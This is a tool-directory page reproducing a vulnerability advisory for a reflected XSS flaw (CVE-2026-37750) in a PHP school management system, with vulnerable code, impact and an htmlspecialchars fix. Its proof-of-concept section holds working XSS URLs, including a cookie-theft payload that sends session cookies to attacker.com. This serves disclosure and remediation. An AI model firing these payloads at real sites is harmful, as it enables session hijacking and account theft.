Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-37750 — Reflected XSS proof-of-concept for School Management System 1.0, demonstrating unauthenticated JavaScript execution via the type parameter in register.php, with impact analysis and remediation guidance. | Kitploit
Tools/GitHubGitHub/menevarad007/cve-2026-37750
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityLearning & Education
GitHubmenevarad007/cve-2026-37750

CVE-2026-37750

Reflected XSS proof-of-concept for School Management System 1.0, demonstrating unauthenticated JavaScript execution via the type parameter in register.php, with impact analysis and remediation guidance.

View Repository
455 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-37750 — School Management System 1.0 - Reflected XSS

Details

FieldInfo
CVE IDCVE-2026-37750
TypeReflected Cross-Site Scripting (XSS)
SeverityMedium (CVSSv3: 6.1)
Vendormahmoudai1
ProductSchool Management System
Version1.0
DiscovererVarad AP Mene
Date2026-04-16
CWECWE-79

Description

A reflected Cross-Site Scripting (XSS) vulnerability in School Management System 1.0 by mahmoudai1 allows unauthenticated remote attackers to execute arbitrary JavaScript in victims browsers via the unsanitized type parameter in register.php. The parameter is reflected without escaping inside an h1 tag at line 22 and inside a form action attribute at line 26. No authentication is required to exploit this vulnerability.

CVE ID: CVE-2026-37750 CWE: CWE-79 CVSSv3: 6.1 Medium (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)


Product Description

School Management System 1.0 is a PHP/MySQL web application by mahmoudai1 on GitHub used to manage students, teachers and parents in schools.

Vendor URL: https://github.com/mahmoudai1/school-management-system


Vulnerable File

register.php — Registration form (no authentication required)


Vulnerable Code

Line 22: echo ucfirst($_REQUEST['type'])

Line 26: echo $_REQUEST['type']

No htmlspecialchars() used — raw user input reflected directly in HTML.


Proof of Concept

Prerequisites:

  • No authentication required
  • Target must be running School Management System 1.0

Step 1 — Open browser and visit this URL: http://target/register.php?type=script-alert-document.cookie-/script

Step 2 — JavaScript executes in browser Result: Alert box fires showing session cookies.

Step 3 — Cookie theft payload: http://target/register.php?type=script-document.location-http://attacker.com/steal?c=-document.cookie-/script Step 4 — Form action injection payload: http://target/register.php?type="-script-alert(1)-/script

Two injection points confirmed:

Injection Point 1 — Inside h1 tag (line 22):

root@kitploit:~
echo ucfirst($_REQUEST['type'])

Output:

root@kitploit:~
<h1><script>alert(1)</script> Application</h1>

Injection Point 2 — Inside form action attribute (line 26):

root@kitploit:~
echo $_REQUEST['type']

Output:

root@kitploit:~
<form action="register.php?type=<script>alert(1)</script>">

Impact

  • Session hijacking via cookie theft
  • Phishing — inject fake login forms
  • Malware distribution via redirects
  • No authentication required

Remediation

Line 22 fix: echo htmlspecialchars(ucfirst($_REQUEST['type']), ENT_QUOTES, 'UTF-8');

Line 26 fix: echo htmlspecialchars($_REQUEST['type'], ENT_QUOTES, 'UTF-8');


References

  • https://github.com/mahmoudai1/school-management-system
  • https://github.com/mahmoudai1/school-management-system/blob/main/register.php

Discoverer

Varad AP Mene Email: [email protected] GitHub: https://github.com/menevarad007

Download Tool